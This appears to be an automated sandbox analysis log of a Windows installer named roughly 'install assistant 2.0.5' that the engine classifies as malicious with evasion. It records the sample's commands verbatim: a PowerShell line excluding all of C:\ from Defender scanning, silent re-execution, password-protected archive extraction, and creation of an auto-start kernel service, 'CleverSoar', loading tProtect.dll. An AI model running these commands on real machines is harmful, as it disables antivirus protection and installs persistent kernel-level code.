Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.00000000036AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000000.1276013755.0000000000DE9000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007FB6A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeBinary or memory string: OriginalFileNamesSmyyeXqWlmD6C.exe vs #U5b89#U88c5#U52a9#U624b2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal92.evad.winEXE@129/33@1/0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9162D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,11_2_6C9162D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A79313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,17_2_00A79313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A83D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00A83D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A79252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,17_2_00A79252
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9157B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,11_2_6C9157B0
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\is-NDNFB.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1252:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3232:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeJump to behavior
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$2042A,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp "C:\Users\user~1\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp" /SL5="$10448,6110134,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
